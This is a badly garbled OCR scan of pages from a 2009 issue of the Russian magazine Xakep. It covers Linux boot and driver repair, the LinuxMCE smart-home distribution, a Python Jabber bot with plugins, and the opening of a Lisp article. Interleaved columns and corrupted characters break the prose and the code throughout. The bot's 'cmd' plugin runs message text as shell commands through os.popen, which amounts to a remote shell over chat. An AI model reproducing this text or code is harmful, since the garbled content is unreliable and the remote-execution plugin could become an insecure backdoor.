на в разряд запрещенной к обсуждениюна
в ответ на приглашениеgrub, должна выдать
1. Загрузка. Затертая запись М BR, забытый
многих тематическихфорумах, попала в мно
на зкран имя дискового раздела, содержащего
парол ь
гочисленные FAQ и глубоко сидит в печенках
каталог /boot/grub. Далее все просто:
root.
2. Оборудование.
111
Подвисания и самопроиз
опытных пользователей. Нет в нашей стране
вольная перезагрузка ОС, паника ядра
новичка в Liпuх, который бы ни разу с ней не
root
3. Винчестеры. Затертая таблица разделов,
сталкивался. А междутем, решение очень про
setup (fldO) qu.it
выход из строя жесткого дис ка.
стое: достаточно загрузиться слюбого Linux
4. Графическая подсистема, Неправильная
LiveCD. открыть окно терминала и набрать
настройка хогg.сопf, отсутствующий видеодрай
заветную команду:
дисковый--раЗДGЛ
Куда реже страдаютот проблемы затертого загрузчика пользователиFreeBSD, нотакое
вер, тормоза.
5.ДраЙвера. Все, что связано с нераспознан
$ sudo grub-install /dev/sda
ным оборудованием.
случается и в с ними. Anгоритм восстановления записи
MBR тут несколько иной:
6. Сеть. Неправильнаянастройка сетевых ин
в большинствеС!'tтуаций зтой команды будет
терфейсов. неработающийОNS-резолвинг.
достаточнодля возвращениязагрузчика на
ногодиска FreeBSD.
Мы рассмотрим способы борьбы с каждой из
законное место. Но если вместо глубоко"ыс
2. Выбираем пункт меню «Flxit», далее «CDROM/
зтих проблем.
ленного молчания gгuЬ-iпstаllразразитсябран
DVD».
ныии ругательствами дело плохо l Придется
3. Набираем 80ткрывшейся командной строке
запустить командную
«bootOcfg -о packet adO && exit».
КОГДА ПИНГВИН ОТКАЗЫ ВАЕТСЯI ВЫХОДИТЬ НА СТАРТ Пробле.,а затертой записи
Установи naKeT пdiswгаррег. скопируй сдиска каталог с офи
вердля предоставлениядоступа к интернету.
- sourceforge.n~
циальны"Драйвером для
Настройка подобных подключенV1Йбыла подробно
!2.ШJеСls/пdiS\Nга ррег.
предназначенныхдля
Windows.
Windows.
найди в нем INF-файл и
выполни зту Ko~~aHДY:
описана в статье «Прорыв сквозь РРР". опубликован ной в майс~ом номере за
# ndis",rapper -i driver. inf ХАКЕР оь
/1261 09
2008 год. За сим я Гlрощаюсь
Удачиl::I:
~
087
юрий "BOBER. РДЭ30РЕНОВ
/ZLOY.BOBRfaGMAIL.COM /
"
"
МОИУМНЫИ
мОМ МОЯ
РЕПОСТЬ
Дистрибутив
LinuxMCE: бесплатное
решение для управления домом
Технология «умного дома» [Smart Но,те) уже не один год будоражит умы как разработчиковсофта и железа, так и обычных пользова
телей. Ведь в домах существуетбольшое количество самых раз нообразныхэлектронныхустройств, при этом никак не связанных между собой. Если ты считаешь, что совместить их в единую сис тему очень дорого и под силутолько специалистамэкстра-класса,
тогда читай эту статью. Постараюсьтебя переубедить.
ние оборудованием при помощи IR Iчерез трансмиттер GC1 001 или Bluetooth. Кроме того, имеющиЙСЯ в ко мплекте 5li т5егуегkейча с
5queezeCen terJ поз воляеттра нсл и ровать ау диопото к на други е ком nOHeHTbI 5та rt Ноте. Начало проекта датированофевралем 2007 года, когда через
n ять месяцев работы на
Ubuntu была практически полностью [без коммерческихмодулей ORM) портирована
система автоматизации Plutohome [построена на Oeblan]. Последующv.е версии LinuxMCE в качестве основы используют Kubuntu. Выбор был продиктованбольшими возможностями КОЕ по интеграции рабочих сред. Хотя нужно отметить, что релизы МСЕ выходят гораздо
позже Kubuntu. Так, верси~ 0704, базирующа яся на Kubuntu 7.04, появилась в августе 2007
[Kubuntu - апрель], текущая стабильная 071 О - в мае 2008. Как можно заметить, нумерация
«MEDIA DIRECTOR - ЭТО ОБЫЧНЫЙ КОМ ПЬЮТЕР, ИСПОЛНЯЮЩИЙ РОЛЬ МЕДИ АКЛИЕНТА, НЕПОСРЕДСТВЕННО ВЫВО
ДЯЩЕГО ВИДЕО НА ЭКРАН ТЕЛЕВИЗОРА ИЛИ МУЗЫКУ В КОЛОНКИ. ЕГО МОЖНО ИСПОЛЬЗОВАТЬ ТАКЖЕ В КАЧЕСТВЕ ДЕ
СКТОПА (С KUBUNTU), ПЕРСОНАЛЬНОГО
ВИДЕО РЕКОРДЕРА
(PVR), ДОМОФОНА ИЛИ
ДЛЯ ВИДЕОСВЯЗИ.».
LinuxMCE отражает версию Kubuntu, который послужилосновой. Релиз 081 О находится на
c~ по сети, но никто не запрещает использовать
данный момент в состоянии разработки,
хард В 5тaгt Ноте может быть несколько
- это
Media
менее 8,5 Гб]. Так как Medla Oirector'bl непос редственноучаствуютв выводе информации,
первый релиз на КDЕ4.Х. Учитыва~ большое
Oiгector' ов, установленных в разных комнатах
ДЛ~ них требуются качественные видео и
I(оличество изменений, вносимых вдистрибут
и подключенных к BbIXOAHblM устройствам. Сам
звуковые карты Разработчикирекомендуютис
и в, при нято реш е н ие с верс и И 081 О iпла н и ру
Соге-сервер может быть «чистым" или гибрид
пользовать с LiпuхМСЕ платы от NVidia lGeForce
ется полностью решить все проблемы, связан
ным IHybrid), то есть быть еще и Media Оiгесtог'ом.
6200 - GeFoгce 8500J. Список TV-тюнеР08 и
ные с переходом на новый КОЕ) мигрировать
Hybrid - наверное, самый простой вариант
карт захвата ты найдешь по ссылке 'В том числе
на годовой цикл 8ыхода дистрибутива.
использования всей системы. Графический интерфейс управлен ия
l-1еКОТОрое время, по прошествии которого заПУСТИ1'СЯ
еще один мастер, на этот раз - House 5etup Wizard [в
проекта LinuxMCE
процессе эксплуатации его можно вызвать из меню
liпuхmсе,огg.
«Misc
- Advanced ОрtlОПS - Setup Wizard»]. На первом шаге проверяются настройки видео и звука; если видно иэоб ражеl-1ие, и слышеl-1 голос, нажимаем «Next>' и получаем
ОРБИТЕР МОЖЕТ ИМЕТЬ НЕСКОЛЬКО ВА
РИАНТОВИНТЕРФЕЙСОВ
для LiпuхМСЕ.
влияют.
-
огромное количество
может разделиться на два:
информации -
House Setup Wizard и Media
Player Wlzard. Первый помогает настроить использова
wiki.
[iпuxтсе.огg.
из списка страну, указать количество И l-1азначение
• Неофициаль
KOMl-1ат, l-1астроить системы уп равления светом, безо
I-1ЫЙ русский
Kubuntu
пасности, параметры VolP-провайдераи РVR-систему
сайт
они действуют только
(MythTV или VOR). Если некоторых устройств в системе
lli1JlZ.D:!.<;.§.J:!J.
на девять шагов. На настройки рабочего стола
l-1e
список устройств удаЛВНI-10ГО управлеl-1ИЯ. Далее мастер
ние системы,ДЛЯ чего ПОl-1адобится ввести имя, выбрать
Wizard". Сам процесс состоитиз трех зтапов. разбитых зти установки никак
• WiKi проекта LinuxMCE содержит
8 последующем мастер можно запус
нет, нажимаем
LlnuxMCE
«Contlnue without опе». Мастер укажет
ЛОГИI-1 и пароль для регистрации и получения готовой
• Интерl-1ет-проект
- A!V Wlzard (или в ко маl-1ДНОЙ строке /u sr/plu to/bin/
почты. Теперь в
«УМI-1ЫЙ дом своими
AVWizard_Run.shl. Вl-1ачале при помощи трех окон
указываем СIlИСОКУСТРОЙСТВ и методы управлеl-1Иfl ими,
выбираем видеОИl-1терфейс[VGA. OVI/HDMI. S-Video
На nослеДl-1ем шаге МОЖl-10 устаl-10ВИТЬ ряд программ
тить повторно из меню
LinuxMCE,
выбрав Аdvапсеd
Media
РlауегWizагdдля каждой комнаты
и такдалееl, разрешеl-1ие и частоту развертки. После
Iw32codecs, OVO С55 и другиеl. Если ПДУ дЛЯ какого-то
проверки правильностизтих установокбудет запрошен
устройства отсутствует, нажимаем «Ооп'! сопtгоl ту ... »
выбор одного из трех вариантов Orbiter
И идеl~ дальше В процессе выбора устройств будут уста
User Interface
IUI). Самый простой - "Static images, по overlay
l-1авливаться все необходимые драйвера, при этом окно
(tlghtweightl" - не требователеl-1 к производителы-1стии
сообщеl-1ИЙ будет чуть перекрывать рабочее поле мастера
руками»
- hosm.ru.
видеоподсистемы и будет работать на всех платформах.
[не очень УДОбноl. По окончан и и щел каем «Start using
~
Наиболее ПРОДВИI-1УТЫЙ
the system». Для
При установке
- «OpenGL with alpha blепdiпg
перехода в КuЬuпtu используем ссылку
warning DVO
!high-endl» - потребует NVidia 6/7/8/9ххх с l-1e Mel-1ee 128
«КОЕ Oesktop» или нажимаем ; если НУЖl-10
Мб ОЗУ. После выбора одного из режимов с поддер
вернуться обратно в LiпuхМСЕ -
жкой
После установки доступен LiпuхМСЕ Admin Webslte, КОТО
жестком диске будут
кнопки "Test". На шаге «Adjust Image 5ize" указываем
PbIl~ можно открыть, обратившись по адресу http://core ip/
ун ичтожены, мулыи
правильный размер изображения. Выбираем разъем, к
pluto-adrnin или l-1ажав кнопку В Launch Manager. Отсюда
загрузка систе"" не
которому подключены аУДИОКОЛОI-1КИ, и тестируем вывод
можно произвести все настройки. о которых говорилось
предусмотрена.
звука а обычном режиме, в Dolby и ОТ5 IOigital Theater
ранее, и по ссылке
50uпd] -
для
OpenGL нужно протестировать работу нажатием
послеДl-1ие два будут достуПI-1Ы в зависимости
.
варианта
LinuxMCE
все данн ые на
l-1a первой странице скачать орбитеры
Windows и 1-1 eКOTopbl е другие утилиты.
от выбраl-1НОГО аудиоразъема. Попутно выставляем
нужную ГрОt-1КОСТЬ. Смотрим итог. Если все в порядке,
ЗАКЛЮЧЕНИЕ
l-1ажимаем
Возможностей у LiпuхМСЕ довольно MI-10ГО, позтому пер
«1 agree»
и ждем некоторое время, пока будут
про изведены соответствующиедоустаl-10ВКИ.
BOl-1ачальную настройку должен производить человек,
ТепеРЬТОЧl-10 все Если был выбран вариаI-1Т«РГtmаГllу
как минимум понимающий, что ОН делает. Что касается
used as а РС". загрузится КОЕ, на рабочем столе которого
последующей зксплуатации, то
будет расположена иконка для запуска LinuxMCE Lаuпсh
даже у чайника
Мапаgег. Менеджер содержит несколько вкладок,
КI-10ПКИ!Х
ХАКЕР
06 /126/ 09
-
ol-1a
не вызовет проблем
выбирай устройство да l-1ажимай
~
091
+++
>> cod;ng
+++
РОМАН
.+++
I
.. SPIRIT.. ХОМЕНКО
НТТР:/ГТUТА'МС.СОМ
I
~
"+++
.+++
----
---~
-+++
.+++
~
РОБОТ ~
а
СХЕМДРДБОТЫДЖДББЕРД
IIH++
,ЛЯ
-+++
.+++
Программимкрутой jаЬЬег-ботс поддержкой +++
+++
плаГИНО8на Python'e Британские ученые давно доказали, что собственным джаббер-ботом
должен обладать любой уважающий себя администратор.
-+++
Еще бы, ведь это он спасет в экстремальной ситуации, когда под рукой
нет putty, зато есть джаббер-клиент [ты ведь уже завязал с аськой, -+ ++
.+++
1'1-+++
правда?]. Пришлотепло,а вместе С НИМ - " выезды на
ноута/субноутанемысл"моll,но я оказался не
от РегL·а. разв"тие которого де-факто пре
природус шашлыками.И пока я смотрел на
таков, и на зтом п"кн"кдля меня закончился.
кращено) системный 'В отличие от вебовского
костер, предвкушая начало отдыха, зазво
Вечером я вспомнил, что на телефоне у меня
РНР) скр"птовый язык программирования.
н"л телефон (в соответстви"с пр"каэаМ!-1 он
установленджаббер-месенджер,и, если бы на
Выбор протокола сделать еще проще, ведь
должен быть при каждом сотруднике мили
серваке присутствовалсоответствующийбот,
у джаббера в этом плане нет конкурентов
ци" на случай 'гревог" "л" команды «сбор»I.
который могбы исполнять его команды, летний
аська не подходит ввиду отсутствия на'ГИВ
3вон"л полковн"к,срочно вызывающийменя
отдых бы не обломался. «Н"когда не поздно
нога шифрования И цеНТРдлизованности lих
на работу и требующий выдать ему на серваке
начать», - сказал себе я и принялся за работу.
сервак может лежать или капиталистическое
новый пароль. Работы на пару минут, но где же
+++
! -+++
начальство опять начнет что-то мутить со
я в лесу достану комп с "нетом? Матерый гик
PYTHON &JABBER
сменой протокола].
портативнуюЭВМ себе, наверняка, найдети
Почему
Юзать на Питоне джаббер-протокол мож
там (пить, гулять" морально разлагатьсябез
- единственный развивающ"йся [в отличие
• 092
Python? А потому,
что зеленый змий
нодвумя способами: простым и сложным.
ХАКЕР
06 /1201 09
юзеров, имеющих доступ к админке Iпароли
ЗАПУСК БОТА
будутхраниться там же!.
Перейдем к использованию хтррру и эапуску
Удобную работу с IПI-файлами В Питоне обе
бота. Сперва создадим объект Jid
спечивает библиотека
передав имя пользователя,
ConfigPar5er. Для чте
ния пара метров мы используем две функции
оттуда. Первая,
read -
для чтения конфигура
ционного файла. и,~я которого передается как
oTxmpp.J 10,
взятого из нашего
загруженного конфига. Создание главного объекта
bot проиэводится
01" xmpp.Client с пере
дачей домена, на котором находится юзер, и
чтобы
пустым списко,~, чтобы на экран не выводилась
достать какой-то параметр. Она принимает в
отладочная информация [тру-хакеры работают
качестве параметров секцию и имя параметра.
только методом научноготыкаl.
параметр. Вторая функция,
get, нужна,
Рассмотри,~ зтуфункцию:
ЛОГО ДЖАББЕРА def loadConfig () :
import
СопfigРаrsеr
JID (config l ' login' ] )
j id =
хтрр.
Ьос
Х(1)рр.Сliепt
'"
(jid.
getDomain{) ,debug=(j)
config = \
"Сложно»
- зто путем чтения документации
[xmggorg/rfesJ и с использованием сокетов.
Если хочешь разобраться с протоколом - зто
способ оптимален, советую посмотреть, как
сдела н бот от
eLWAux [исходники
есть на
ConfigParser.ConfigParser() 10gin = config. get ('
страстиями. Мне больше понравилась хтрррру оТ Алексея Нежданова. Ею мы и ВОСГlOльзуе,кя.
Эдесь МЫ читаем переменнуюсо списком
Прием сообщения в хтррру реализуется
юзеров, которым разрешен доступ в админку,
через привязкуфункции К событию прихода
АРХИТЕКТУРА
и превращаем В список методом 5plit по за
сообщения. Сначала нужно создать функцию,
Итак, задача поставлена: написатьджаббер
пятой как разделителю. Далее все пара метры
к примеру,
мы возвращаем упакованными В ассоциа
Rеgl5tегНапd
'бот, способный принимать и исполнять команды. Нет, стой, зто слишком просто.
тивный массив (на языке Питона
Усложним все и напишем полноценный бот
Теперь конфиг можно прочитать:
-
message, а потом, методом bot. ler зарегистрировать ее'
словарь].
bot.RegisterHandler('message' ,
с поддержкой плаГИН08, один из которых и
message)
config =
решает задачу администрирований.
lоаdСопfig{)
С истема у нас будет состоять из бота [Ьо t.
Теперь в цикле необходимо вызвать
ру), файла конфигурации [сопflg.iпiJ, папки с
Process[1),
плагинами
Ipluginsj и библиотеки
bot.
который принимает входящие
хтррру. Бот
будет иметь два типа плагинов. Представи тели первой группы доступны всем, второй
лишь избранным, по списку или паролю.
При проектировании системы с плагинами всегда встает вопрос об их полномочиях по
управлению ботом. С одной стороны, чем
ПРОЕКТ JABBER Jabber-сисrема MrHoBeHHoro обмена сообщениями и информацией о uрисyr(:твии
меНЫliе прав плагину мы даем, тем проще
на основе
их писать, но и возможности получаются
1998 года и стартовал С разработки сервераjabberd. В настоящий момент есть некото
ollipblToro uротокола ХМРР. Проект был основанДжереми МИJUIером в начале
более ограниченными Позтому пусть лучше
рая неuонятность в отношении терминовjаЬЬеr и хтрр. Даже в английской Википедии
плагины будут низкоуровневыми Трудностей
cjabbel' стоит uереадресация на хтрр. Эта непонятка в первую очередь связана с тем,
мы не боимсй.
что под именем хmрр uротокол был стандартизирован в ШТЕ Каждый uользователь в джаббер-сети имеет уникальный идентификатор -Jabber ID (сокращенно ЛD). Адрес
СИСТЕМА КОНФИГОВ
ЛD содержит имя пользователя идоменное имя сервера, на котором зареrnстрирован
Программинг бота начнем с реализации
пользователь. Подобно адресу электронной почты, они разделены знаком@. Пользо
чтения конфига. который будетхраниться во
ватель может иметь одновременно несколько подюпочений, для различения которых
всем известном iпi-формате в файле
используется дополнительное значепие ЛD, называемое «ресурсом» И добавляемое через
ini
config.
[кстати, амеры весело произносят«iпi» как
«аЙнаЙ»). В секции
connect мы
разместим па
раметры доступа к ацаунту, на котором будет
висеть бот, а в секции
ХАКЕР
06 11261 09
perrrllsslon -
список
<:леш вконецадреса.!{ uримеру, пусть полный адрес пользователя будет lIser@example. com/work, тоrда сообщения, носланные на адрес usеr@ехаmрlе.соm,доЙдyrнауказан ный адрес вне зависимости от имени ресурса, но сообщения для [email protected]/work
дойдут только при соответствующем ПОДJUIЮченном ресурсе!
~
093
1'" -+++
»
I
cod;ng INTER~~ET
ПОД,РОБН'ЕЕ охмРРРу
ССЫЛКИ
НАОБЪЕКТЫ
И ПЕРЕМЕН'НЫЕ
ULIE \
Библиотека хтррру содержит мпого полезных объектов,
юоанс, про который часто забывают_ Рассмотрим прнмер раБоты
Объект JID ДЦЯработыс Jabber т. При создапиипринимает
главный объект Client. При созданиипринимаетдомеп джаббер-сервераи перемеинуюДJIЯ отладочнойинформации, Методы:
• сопnесt, подключеиие к серверу; • auth, авторизация,припимаетпараметры: имя пользователяИ
class Obj () :
def _init_(self) :
pass
пароль;
--+++
• а
= Obj{); a.var = 1;
pr'int print
-+++
а. Ь.
Ь
=
а;
iq) и имя фУНКЦИИ; • sепd1пitРrеsепсс, отправка начальных запросов, нужно запу
var #2
var n2
скатьпосле авторизации;
Сюрпрпз! На экран выводятся сплошные двойки! А случает ся это потому, что операция
--+++
--+++
-+++
• sепd, отправка сообщений, принимает объект Message; • Process, запустить обработку входных сообщений; • disconnect, отключиться от сервера.
«=" при работе с объектами не
копирует их, как при других типах переменных, а создает
Message- объектсообщения.Прпнпмаетпараметры-
ссылку.
юзера И текст сообщения,
В контексте нашего прпмера ЭТО означает, что переменную
Методы:
bot мы обычно передаваликак бы по значению, а деле как ссылку,
• getBody, возвращает текст сообщения; • getFTom, возвращает имя пользователя,
на самом
сообщеf1ИЯ и обрабатываетих Разумеется. веЧf1ЫЙ цикл здесь
f1e
RеgistеrНапdlеr, привязкафункцнй к событиям, принимает
параметры тип события(mеssаgе, рrеsепсе,
b.var' = 2
нужен. поэтому в свойстве опllпе смело запишем единичку. и
будем крутить цикл дотех пор. пока эта единичка
f1e
изменит свое
имя
от кого сообщение,
bot . оп1 ine = 1 ,.,hi1e bat, on1ine: bot, Pr'ocess (1) bot.disconnect()
Зf1ачеf1ие;
-+++
--+++
ПIРОЦЕДУРАОБРА'БОТК~
ВХОДЯЩИХСООБЩЕНИИ
--+ ++
def message(conn,mess) : globa1 bot text = mess. getBody ( ) #если сообщение служебное
#Достаем !~Я пользователя
-
выходим
if ( text == None ) :
return
Из вхоцящего сообщения достаем команду
command
~
user = filess. getFrom ( ) user = str (user-) . sp1iL (' /') \1ser' = \lser [О] iFЕсли юзер не адиин
-+++ text.sp1it ( .. )
command = command [ О]
-
говорим «команды нет).)
if \lser' поt in bot.config[ 'user_nO""pass']; text = "wI'ong соmшапд. try 'help'" bot. send (хтрр .Message (filess. getFrom () ,text) ) геtuсп
"'Г+++ liесли команда в списке nyбличных
-
запускаем
if command inbot. p1ugins [ 'public_comrnands' ) : #Запускаем команду
+++
r\lnPlugin (command, bol: .mess)
ret\lrn
.~
094
#Если ::<;.оманда есть в «админских»
i f command
iп
bot, p1ugins [ , comrnands' ] :
гuПРl\lgiп(command,
\11 .'
Рассмотрим некоторые из них.
в Питоне (да и в другихязыках, например,в РНР) , есть один
a~1;b=a;b=2
,
bot. mess)
else: text = "wrong соrпmапд. (ГУ 'help'" bot.send(xmpp,Message(mess,getFrom() .text») ХАКЕР
06 /126/ 09
А
» cod;ng
I
I
~
U1.Л: \
.~~
\
\ \
.. I><,.. ,.:.н.,
··(..·,.".1'·"
'lI-!
i
.
.........,.....~ .;.",...... <;~~,;
l
-1
ь..-
:~ rr~~~ i§;~:;i:~::'[!:,T:7:~::, Ё@ '~.E
I
! i
..
о
O'REILLY'
КНИГА ПО ДЖАББЕРУ
NET8EANS ДЛЯ PYTHON
Для остановки бота нам будет достаточно изменить
8
1 на
ОТЛИЧНАЯ
О.
еУР080ЕПИТОН08еКОЕЛОГО
IDE
imporc
хтрр
результате, он корректно отсоединится от сервера и за
вершитсвою работу.
def init () :
KorAa наш бот запущен. мы можем вернуться к написанию
return
О
фУНКЦИИ обработки входящих сообщений. Простейший вариант. способный принимать сообщение и реагироватьна сей знаменательный факт. выглядит примерно так:
def run(bot,mess}:
bot. send(xmpp.Message (mess.getFrom() ,
rneSS.getBody()
Напишем функцию,загружающую наши плагины. Поскольку
(шеss. getвody ()
if
== None ) :
]lnks
net - сайт библиоте
def message(COnn,mess):
global bot
~
xmpppy.sollГceforg~.
)
ки хтррру.
мы уже решили. что ОНИ ДОЛЖНЫ находиться В папке рlugiпs. то взтом каталоге нам придется поместитьnустоЙфаЙл_iпit_.ру
rеtUП1
- та ково требование Питона. Это шаманское действо позволит нам ИМПОРТИР08атьфайлы как модульфункциеЙ_imрогt_.
bot.send{ хтрр. Message
(mess . getFrorn () , 'helJ.o' ) )
Итак. нам нужно загрузить все файлы. размещенные В папке
plugins !кроме _init_.pyJ в какую-то nеременную.Кроме В гlачале этого участка кода мы командой «global bot» по
того, во время инициализациимы создадимдва списка,
лучаем доступ к объеК1у нашего бота. Далее идет обработка
которые будутсодержать реестр загруженного.В первом
входящего сообщения, где с помощью команды mess.
(public_commands) будут nеречисленыте плагины, которые
getBodYMbI получаем сообщение. Если входящее сообщение
можно запуститьбез авториэации.а во втором Icommandsl
~
dvd
равно None. это означает, что пришла служебная команда
- элитные (тру. VIP] - админсхие плагины. В качестве ре
•
На диске ты
(допустим. про то, что юзер что-то нам печатает). Такие со
зультата работы функция вернет нам ассоциативный массив
найдешь полные ис
общения мы обрабатывать не настроены, и реакция на них
с nлагинами и списками:
ходники бота.
однозначна
выход изфункции.
-
В следующей части Марлезонского балета мы воспользу емся методом
send,
отправив в отее1' простое сообщение.
• Видео. иллюстриру
def 10adPlugins():
import
ющее работу с ботом.
ОБ
Этот метод в качестве параметра принимает объект Message
commands = []
ждет тебя та м же
библиотеки хтррру. При ее создании мы передаем два пара
public_commands = []
на нашем
метра' первый
второй
-
-
DVD
кому нужно отправить сообщения, а
текст сообщения.
#Пере6ираем :е:с:е файл
1
ИЗ пar:RИ
plugi:os
for fname . n os. listdir ( 'plugins/ ' ) :
ПЛАГИНЫ
#ЕсJТИ файл заканчизгется H<:J '. ру'
Простая поддержка плагиноо реализована в самой
j
f fname. endSNi th ( , . ру' ) :
библиотеке хтррру. но мы сделаем ее по-своему. написав
собственную архитектуру плагинов (как минимум. с блэкдже
~Обрезае~1 последние
KOM!I. Сначала
plugin_narne =
определимся со структурой плагина. Каждый
Еnаrnе!
плагин будет иметь название. аналогичное исполняемой
tfЕслJ.1 и.ня файла не
им команде. К примеру, если мы хотим создать nлагин,
i
Е
3
буi:ВЫ
:-3]
'_init__ 1
plugin_name ! = '_ini t_· :
который на команду «echo some text» посылает сообщение с зтим же текстом, то плагин должен будет называться echo
:#Загружаен nлаrи..i-f в :1ереыенную
и раэмещаться в файл echo.py в каталоге plugins. В каждом
pl\.1gins = _irnport_( 'plugins.' +
nлагинедолжнысодержатьсядве функции. Одна. iпit, может
plugin_name}
проводитьнекую предварительнуюинициализациюи обяза тельно возвращать 1. если плагин можно использоватьлишь
~ДостаеN. ппdг:и"':-: с Г!ере:-!е ~НОЙ
админам, и О, если всем юзерам. Вторая же обюательная
plugin = getattr (plugins, plugin_name)
функция
- run - s
качестве входного параметра принимает
ссылку на наш бот и оходящее сообщение. К примеру, плагин есtю EJыглядиттак:
ХАКЕР
06 /126/ 09
i f plugin.init():
~
095
1'"
+++
>> ,::oding
INTERNET
,
MONTAGUE .NET
I
F::-~
-------
ОБРАБОТКАСООБЩЕНИЙ
commands. append (plugin_name)
Осталось изме~IИТЬ функцию me55age, которая обрабатывает входящие
else:
сообщения. Логика ее ра боты та кова:
public_commands.append(plugin_name}
• Выделяем из входящего сообщения команду [символы от начала до пробелаl,
#Во:?вращаем аССО~Иа'1'ианый словарь
• Смотрим fiаличие команды в списке «публичных»,
return
,-+++
'plugins' :pl1.1gins,
• Если к публичным ofia не относится, стало быть -
rСОйLmаnds' ;con~ndSt
веряем авторизацию и факт наличия команды в списке
'Р1.1Ы iс_сопunапds'
«админских»
:publ iс_соmшапds
про
• Если команда нашлась, то запускаем ее. 8 противном случае сообщаем юзеру о прискорбfiОМ факте отсутствия кома:,ды в fiаших списках.
Кстати, рассмотрим ОДИfi момент Имя польэователя, которое
«ЗАДАЧА ПОСТАВЛЕНА:
возвращает команда me5s.getFromlJ, не всегда возвратит праВИЛЬfiое значение
НАПИСАТЬД>КАББЕР-БОТ,
обрезать, например, вызвав метод строки splitU') и потом взять первый элемент списка. Полностью функцию смотри на соот
И ИСПОЛНЯТЬ КОМАНДЫ.
ветствующей врезке,
НЕТ, ЭТО СЛИШКОМ просто. УСЛОЖНИМ ВСЕ И НАПИШЕМ
. - +++
,-+++
1+++
ПОЛНОЦЕННЫЙ БОТ С ПОДДЕРЖКОЙ ПЛАГИНОВ, ОДИН ИЗ КОТОРЫХ
• Обрезаем первые 4 символа входящего сообщения [к примеру, cmd ls ~ l5). • Передаем команду в цепочкуфункций 05.рореп[сmd] read(l. • Получен fibI й резул ьтат кон вертируем Iпри fiеоБХОДИМОС1"иJ в utf-8lпри
imporl.
хтрр
import
08
«fia лету" - советую подробfiО в ней разобратьсй. После getattr с указанием в
первом параметре имеfiИ пере
меНfiОЙ, где хранятсй плагины, а во втором параметре -
def ini t () : relurn 1
имени
плагина. В результате, функция возвращает сам плаГИfi, из которого
def
ruп(Ьоt,щеss):
уже потом можно вызывать функции, в нем fiаходящиеся. К примеру,
cmd =
В вышеуказаfiНОЙ фУfiКЦИИ загрузки мы запускаем для каждого из
ста
них фУfiКЦИЮ
,-+ ++
«cmd», а ПРИfiЦИП его работы будеттаков:
Вот как это выглядит в строках сурового программного кода:
загрузки в перемеfiНУЮ рltJgiП5 плаГИfiа, его оттуда МОЖfiО BbIH1fiYTb
[-+++
плаГИfi, ис
• Возвращаем пользователю результат.
АДМИНИСТРИРОВАНИЯ».
функцией
-
полняющий системные команды. Наречен он будет говорящим именем
UNICODE].
И БУДЕТ РЕШАТЬ ЗАДАЧУ
плаГИfiОВ
ИСПОЛНЕНИЕ КОМАНД Ну, вот и настало время закодить «виновника торжества»
инициализации бота мы не указывали кодировку, поумолчаниюэто будет
Эта фУfiКЦИЯ важна длй пони мания работы Питона в плаfiе загрузки
.-+++
эрения проверки авторизации).
Джаббер). которое нам не НУЖfiО. Стало быть, ресурс мы должны
СПОСОБНЫЙ ПРИНИМАТЬ -+++
Ic точки
Почему? Ведь там может быть имя ресурса feмотри врезку про
тевв
. getBcdy ( )
= сщd[4:]
mit_ В зависимости от результата имя плагина добав
лйем или В список РUЫIC_соmmапds, или в
commands.
НаписаfiНУЮ
o1.1tp1.1t =
ОВ.рореп(стСО
.read()
загрузку плагинов можно заюзать И при этом записатьрезультатв соот
ветствующеесвойство бота:
if
по!:
isinstance(output,
UТlicode),
output = unicode (OtltP1.1t, '1.1tf-8' ,'ignore')
,-+++
bot.pl1.1gins = loadPlugins() bot. send(xmpp,Message (mess.getFrom{) ,Otltp1.1t)) Чтобы вызвать наш плагин, fiапишем малеfiЬКУЮфункцию, которая будет принимать имя
KOMafiAbI, ссылку fia бота и входящее сообщение:
i-+++ def
пшРlugiп (соrnrl1зпd,Ьоt ,mess)
:
Мы реализовали все. что хотели, оставив задел для неогра
БЕССМЕРТИЯ LISP (а) (отто" Lisp: музейный экспонат или мощное средство
+++
создания ИНlтеллектуального софта?
Сегодня мы попробуем взорвать твой мозгторжественным раскрыти ем тайны бессмертия языка
-.+++
«Lisp». Ты узнаешь, что за штуку придумал
Джон Маккарти [тогдашний «Эйнштейн» мира программирования] В1958 году, почему эта «штука» не планирует подвергатьсязабвению и кто такие странные существа -
«Лисперы».
+++ ИЗСЕТИ
+++
+++
+ ++
+++
именно так: программа может быть сгенери
АI-приложений Разумеется, для разработки
рована во время выполнения
даютте, кому приходилось с ними [адептами)
аеб-приложениЙ.приложениЙ,взаимо
можешь переопределить уже определенные
функции, то есть, язык позволяет писать
-
головная больлюдей в
l
Кроме того, ты
контактировать. Вот, например, высказывание
действующих с базами данных, и прочего
одного из модераторов форума известного
общественно-полезногостаффа он также
самоизменяемые программы без исполь
ресурса
используется.
зования ассемблера. Все эти манипуляции
Illlp:lirsdn.ru:
«Функциональные
языки в целом и Лисп в частности собрали
Одно из многих положительных качеств Лиспа
можно производить и В «докомпиляционной"
вокругсебя много откровенноневыдержанной
-
стадии, что очень способствует построению
и фанатичной публики». Чтож. приобщимся к
Два основных правила таковы:
их знаниям.
1.Твоя программа,а конкретно
его максимально аскетичный синтаксис.
оптимизированных программ. Для более
-
вызов функ
основательного ознакш~ления С фичами
ции, должна быть заключена в скобки:
языка весьма рекомендую зайти на один из
Например: Iтвоя_программа параметр'l
лучших ресурсов по основам Лиспа:
параметр2 .. параметрNJ.
pcl.catap.ru,
ТЕОРИЯ. СКАЖИ «НЕТ» СИНТАКСИIЧЕСКОМУ РАЗВРАТУ!
2.
Сразууточню,что под термином «Лисп» В
другой функции, и ее результат будет счи
статье подразумеваетсядиалект«Согnrnоп
таться параметром: (твоя_программа (+ 12)
LISp» [тем не менее, очень многое с небольши
параметр2J.
ми оговорками применимо и к диалекту Лиспа
В Лиспе реализовано множество свойств,
ПОДГОТОВКА ИНСТРУМЕНТОВ
«5cheme»J. На сегодняшний день [если не
которые создатели других языков не устают
Для начала скачаем бесплатнуюверсию про
говорить о языках общего назначения
черпать, постепенно превращая свои языки В
стенькой Лисп-системыLispWorks, которая
- ELisp
AutoLlspNisualLispl в широком употребле
На месте пара метра может быть вызов
Лисп. Одно из них
-
ато использование функ
b.11QJ!.
там находится переведенная на
русский язык книга "ПрактическийСогnmоп
Lisp" Питера Сейбеля.
поджидает любого начинающего эксперимен
нии осталисьтолько эти два диалекта.
циональных объектов В качестве параме
татора на "vvvw.lisgWDгks.соrn/dО\ЛlПlоаds.
Итак, что же зто за эверь -
тров функции ты можешь передавать другие
Чтоты говоришь? Не желаешь пользоваться
функции, которые, кстати, возможно опреде
«простенькой системой»? Желаешь иметь
Lisp?
Это язык
общего назначения, особенно удобный
+++
лить во время выполнения программы. Да,
